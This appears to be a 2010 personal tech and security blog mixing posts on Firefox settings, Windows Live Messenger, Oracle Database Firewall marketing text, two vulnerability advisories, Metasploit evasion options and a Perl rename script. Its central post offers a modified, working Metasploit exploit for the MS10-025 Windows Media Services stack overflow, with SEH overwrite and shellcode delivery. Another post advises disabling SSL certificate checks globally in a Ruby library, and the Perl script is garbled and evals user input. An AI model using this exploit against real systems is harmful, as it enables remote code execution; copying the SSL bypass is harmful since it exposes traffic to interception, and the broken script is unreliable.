Sunday, December 19, 2010

Open popups in new windows in firefox

Did you ever face problems with popups when you wish them to open in new tab instead in a new windows. it simple in your firefox type about:config and change value of parameter to 0 . your problem will be solve.

Friday, December 10, 2010

MSN Still Missing Twitter


I  Installed latest Windows Live Messenger 2011 great improvement from its ancestors. It is faster & pretty cool theme based GUI. the biggest makeover/usp of this new toy is its ability to seamless integration with various social network like


facebook, linkdin etc.

Although Some article claim that it also integrate twitter that turn out to be false that’s the only gem that is missing from msn . I am looking forward to Microsoft to provide twitter integration also so I won’t require to use my browser or third party plugin to stay on twitter also . 


Other service which I wish to access through msn is orkut (Social networking Site widely used in india). but twitter is in nomber one in my list. as I am habitual to use Echophone ( firefox plugin ) that keep me connected on twitter all the time without opening extra webpage & shows new tweets instantly.

Msn can keep me updated on my  facebook update & hotmail with twitter my online social requirement would be fulfilled. I don’t want to use any third party tool/plugin for this purpose due to performance & security reasons hope that Microsoft soon integrate the Twitter & orkut let’s cross the finger.

Oracle Database Firewall


Oracle Database Firewall

Cost Effective Protection for Oracle and non-Oracle Databases
Oracle Database Firewall, part of Oracle's comprehensive portfolio of database security solutions, is the first line of defense for both Oracle and non-Oracle databases. It monitors database activity on the network to help prevent unauthorized access, SQL injections, privilege or role escalation, and other external and internal attacks - all in real time. Based on innovative SQL grammar technology that can reduce millions of SQL statement into a small number of SQL characteristics, Oracle Database Firewall offers unmatched accuracy, scalability, and performance. Enforcement of positive (white lists) and negative (black lists) security models provides protection from threats without time consuming and costly false positives. Oracle Database Firewall also enables organizations to address SOX, PCI, HIPAA/HITECH, and other regulatory requirements without changes to existing applications or databases, and demonstrate compliance with over a hundred built-in customizable reports.

Oracle Database Firewall Key Features


Database Firewall for Security and Compliance

White list, black list, exception list policies

3-click security policies

Safe, scalable deployment models

Flexible reporting and alerting

Database Firewall for Security and Compliance

Traditional network firewalls are an established technology and play an important role in protecting data centers from unauthorized access from the outside. Data center attacks, however, have grown increasingly sophisticated, leveraging porous perimeters on the inside to launch attacks on the database itself.

Examining SQL traffic and enforcing security policies on the network has emerged as an important addition to the defense-in-depth security architecture. This is specially true in heterogeneous database environments where security controls can not be enforced in the database itself. Oracle Database Firewall creates a defensive perimeter around databases, monitoring and enforcing normal application behavior, helping to prevent SQL injection attacks and attempts to access sensitive application data using unauthorized SQL commands. Oracle Database Firewall:

· Monitors and blocks SQL traffic on the network with white list, black list and exception list policies

· Protects against application bypass, SQL injection and similar threats

· Reports on database activity for SOX, PCI and other regulations, choosing from over 100 out-of-the-box reports

· Protects Oracle, SQL Server and Sybase databases

White list, black list, exception list policies

Oracle Database Firewall examines the grammar of the SQL statements being sent to the database, analyzes their meaning, and determines the appropriate security policy to apply. This highly accurate approach provides a significantly higher degree of protection than first-generation database monitoring technologies that relied on recognizing the "signature" of known security threats. By enforcing normal application behavior, Oracle Database Firewall helps organizations avoid the costly and disruptive false positives and false negatives common with other approaches. Oracle Database Firewall recognizes SQL injection attacks on compromised applications and blocks them before they reach the database.

3-click security policies

Oracle Database Firewall supports white list, black list, and exception list policies. White list policies are simply the set of approved SQL commands that the firewall expects to see. These can be learned over time or imported from another Oracle Database Firewall. Black list policies are SQL commands that are not permitted to be sent to the database. Exception list polices provide additional deployment flexibility that can be used for one-off reporting or other special requirements. Policies can be enforced based on attributes including SQL category, time of day, applications, user, and IP addresses.


Oracle Database Firewall can log the SQL command in question, block the SQL command, or substitute the incoming bad SQL request with an alternative SQL statement that, for example, simply returns no data, or returns a predetermined error message such as "no records found". This flexibility, combined with advanced SQL grammar analysis, enables organizations to spend more time doing what needs to be done and less time handling false alarms.

Safe, Scalable Deployment Models

Oracle Database Firewall works on the network, transparent to database servers and applications, and can be quickly deployed. Customers can choose from several deployment models to meet their business requirements:

· Inline blocking and monitoring mode

· Inline monitoring-only mode

· Out-of-band monitoring mode

Oracle Database Firewall provides a centralized management console for monitoring multiple databases simultaneously and supports parallel devices for high availability deployments. Optional host-based agents can provide low-impact local monitoring capabilities.



Flexible reporting and alerting

Oracle Database Firewall includes over 125 prebuilt reports that can be easily customized for regulations such as PCI, HIPAA and SOX. Real-time alerts can also be setup for fast response to any policy exception. For privacy and compliance requirements, personally identifiable information contained in logged SQL can be masked.


Thursday, September 16, 2010

CollabNet Subversion Edge Log Parser XSS/Code Injection Vulnerability

Discovery Date: Sep 10, 2010
Risk: Important

There is a Cross Site Script (XSS) vulnerability that exists in CollabNet Subversion Edge 1.2 and prior versions. This said vulnerability can be exploited by sending a crafted request to the CollabNet Subversion. server. When an administrator tries to view the log file then this XSS Code will get executed.

More information on this can be found on the following page:

Patch Information:

More information on the patch can be found in the following page:

Discovered by: Sumit Kumar Soni, Trend Micro

Sunday, June 20, 2010

Wing FTP Server PORT Command DoS Vulnerability

Discovery Date: Nov 14, 2009
Risk: Important
Affected Software:

* Wing FTP Server 3.1.2


There is a Denial of Service (DoS) vulnerability that exists in Wing FTP Server 3.1.2. The said vulnerability can be exploited by using an invalid parameter for PORT command. When exploited successfully, the vulnerability could cause FTP server using the said software to crash.

Wing FTP Server 3.1.2 on a Windows environment is affected. Other versions may also be affected.

Patch Information:

More information on the patch can be found in the following page:

* Wing FTP Server History

Discovered by: Sumit Kumar Soni , Trend Micro
Email: ssummit @
Read more about this threat incident in the Malware Blog entry "Trend Micro Discovers Wing FTP Server PORT Command DoS Bug."

Thursday, April 29, 2010

Solution to avoid SSL Cert Verification in Ruby Soap4r

Just add

@verify_mode = SSL::VERIFY_NONE

in C:\ruby\lib\ruby\gems\1.8\gems\httpclient-\lib\httpclient\ssl_config.rb

if you want to avoid following error.

at depth 0 - 18: self signed certificate
c:/ruby/lib/ruby/gems/1.8/gems/httpclient- `connect': certificate verify failed (OpenSSL::SSL::SSLError)
from c:/ruby/lib/ruby/gems/1.8/gems/httpclient- `ssl_connect'
from c:/ruby/lib/ruby/gems/1.8/gems/httpclient- `connect'
from c:/ruby/lib/ruby/gems/1.8/gems/httpclient- `timeout'
from c:/ruby/lib/ruby/gems/1.8/gems/httpclient- `connect'
from c:/ruby/lib/ruby/gems/1.8/gems/httpclient- `query'
from c:/ruby/lib/ruby/gems/1.8/gems/httpclient- `query'
from c:/ruby/lib/ruby/gems/1.8/gems/httpclient- `do_get_block'
from c:/ruby/lib/ruby/gems/1.8/gems/httpclient- `do_request'
... 7 levels...
from c:/ruby/lib/ruby/gems/1.8/gems/soap4r-1.5.8/lib/soap/rpc/proxy.rb:143:in `call'
from c:/ruby/lib/ruby/gems/1.8/gems/soap4r-1.5.8/lib/soap/rpc/driver.rb:181:in `call'

Sunday, April 25, 2010

Rename Multiple Files

Usage: rename perlexpr direpath

#!/usr/bin/perl -w
if($#ARGV !=1)
print "Usage: rename perlexpr direpath\n";
print "ex. rename s/exe/html c:/test";
$regexp=shift ;
opendir(DIR, "$dir");
@files = readdir(DIR);
foreach $_ (@files) {
print "file-->$file\n";
eval $regexp;
die $@ if $@;
print "$path\n";
rename($path,"$dir/$_" ) unless $file eq $_;

Friday, April 23, 2010

Whats wrong with MSF ms10_025_wmss_connect_funnel Sploit

Looks Like metasploit team added this exploit in the frame work in hurry . They are sending Current info & Transport info message in single packet that will never exploit the vulnerability ( Correct me).

here is the modified Code that should work .

# $Id: ms10_025_wmss_connect_funnel.rb 9101 2010-04-17 11:22:37Z swtornio $

# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.

class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking

include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh

def initialize(info = {})
'Name' => 'Windows Media Services ConnectFunnel Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the Windows Media
Unicast Service version (NUMS.exe). By sending a specially
crafted FunnelConnect request, an attacker can execute arbitrary code
under the "NetShowServices" user account. Windows Media Services 4.1 ships
with Windows 2000 Server, but is not installed by default.

NOTE: This service does NOT restart automatically. Successful, as well as
unsuccessful exploitation attempts will kill the service which prevents
additional attempts.
'Author' => 'jduck',
'License' => MSF_LICENSE,
'Version' => '$Revision: 9101 $',
'References' =>
[ 'CVE', '2010-0478' ],
[ 'OSVDB', '63726' ],
[ 'MSB', 'MS10-025' ],
[ 'URL', '' ]
'DefaultOptions' =>
'EXITFUNC' => 'thread',
'Payload' =>
'Space' => 600,
'BadChars' => "\x00\x5c",
'StackAdjustment' => -3500,
'Platform' => 'win',
'Targets' =>
[ 'Windows 2000 Pro SP4 English',
# SEH handler offset is 840
# Stack return is at 652
'Offset' => 840,
'Ret' => 0x75022ac4 # p/p/r in ws2help.dll
'Privileged' => false,
'DisclosureDate' => 'Apr 13 2010',
'DefaultTarget' => 0))

], self.class)

def exploit
@pkts = 0
cmd_buf = ''

# LinkViewerToMacConnect
subscriber = "NSPlayer/; {68c0a090-8797-11d2-a2b3-00a0c9b60551}"
#subscriber = "NSPlayer/; {}; Host: The.Host.Net"
#subscriber = "Spooooon!"
subscriber << "\x00"
subscriber = Rex::Text.to_unicode(subscriber)
cmd_buf << make_command(0x30001, subscriber)

# LinkViewerToMacConnectFunnel
#name = Rex::Text.pattern_create(512)
name = ''
name << "\\\\"
name << rand_text((target['Offset'] + 4 + 5) / 2)
name << "\\"
name << "\x00"

# Convert it to Unicode..
name = Rex::Text.to_unicode(name)

# Insert the return address..
name[4,payload.encoded.length] = payload.encoded

# Build the SEH frame that leads to the payload...
seh = generate_seh_record(target.ret)
asm = "add edi, 0x04\njmp edi"
seh << Metasm::Shellcode.assemble(, asm).encode_string
name[target['Offset'],seh.length] = seh

##sumit start
pkt = make_tcpmsghdr(cmd_buf)
##sumit done
cmd_buf = ''

# Add it to the command buffer..
cmd_buf << make_command(0x30002, name)

# Build the TcpMessageHeader ..
pkt = make_tcpmsghdr(cmd_buf)

print_status("Sending crafy commands (#{pkt.length} bytes) ...")
# Handle the transacation..


# Create a TcpMessageHeader from the supplied data
def make_tcpmsghdr(data)
len = data.length
# The server doesn't like packets that are bigger...
raise RuntimeError, 'Length too big' if (len > 0x1000)
len /= 8

# Pack the pieces in ...
pkt = [
1,0,0,0, # rep, ver, verMinor, pad
0xb00bface, # session id (nice)
data.length + 16, # msg len
0x20534d4d, # seal ("MMS ")
len + 2, # chunkCount
@pkts, 0, # seq, MBZ
rand(0xffffffff),rand(0xffffffff) # timeSent -- w/e

# Add the data
pkt << data

# Pad it to 8 bytes...
left = data.length % 8
pkt << ("\x00" * (8 - left)) if (left > 0)


# Create a command packet
def make_command(msg_id, extra)
# Two opcodes, get handled differently..
case msg_id
when 0x30001
data = [0xf0f0f0f0,0x0004000b,0x0003001c].pack('VVV')

when 0x30002
data = [0xf0f0f0f1,0xffffffff,0,0x989680,0x00000002].pack('VVVVV')


# Put some data on...
data << extra

# Pad it to 8 bytes...
left = data.length % 8
data << ("\x00" * (8 - left)) if (left > 0)

# Combine the pieces..
pkt = [
(data.length / 8) + 1, # chunkLen
msg_id # msg ID
pkt << data



Saturday, March 27, 2010

What is not Correct with MSF

Looks Like there spell check miss this typo ( check TCP::max_send_size Description)

msf exploit(ms08_067_netapi) > show evasion

Module evasion options:

Name : DCERPC::fake_bind_multi
Current Setting: true
Description : Use multi-context bind calls

Name : DCERPC::fake_bind_multi_append
Current Setting: 0
Description : Set the number of UUIDs to append the target

Name : DCERPC::fake_bind_multi_prepend
Current Setting: 0
Description : Set the number of UUIDs to prepend before the target

Name : DCERPC::max_frag_size
Current Setting: 4096
Description : Set the DCERPC packet fragmentation size

Name : DCERPC::smb_pipeio
Current Setting: rw
Description : Use a different delivery method for accessing named pipes
(accepted: rw, trans)

Name : SMB::obscure_trans_pipe_level
Current Setting: 0
Description : Obscure PIPE string in TransNamedPipe (level 0-3)

Name : SMB::pad_data_level
Current Setting: 0
Description : Place extra padding between headers and data (level 0-3)

Name : SMB::pad_file_level
Current Setting: 0
Description : Obscure path names used in open/create (level 0-3)

Name : SMB::pipe_evasion
Current Setting: False
Description : Enable segmented read/writes for SMB Pipes

Name : SMB::pipe_read_max_size
Current Setting: 1024
Description : Maximum buffer size for pipe reads

Name : SMB::pipe_read_min_size
Current Setting: 1
Description : Minimum buffer size for pipe reads

Name : SMB::pipe_write_max_size
Current Setting: 1024
Description : Maximum buffer size for pipe writes

Name : SMB::pipe_write_min_size
Current Setting: 1
Description : Minimum buffer size for pipe writes

Name : TCP::max_send_size
Current Setting: 0
Description : Maxiumum tcp segment size. (0 = disable)

Name : TCP::send_delay
Current Setting: 0
Description : Delays inserted before every send. (0 = disable)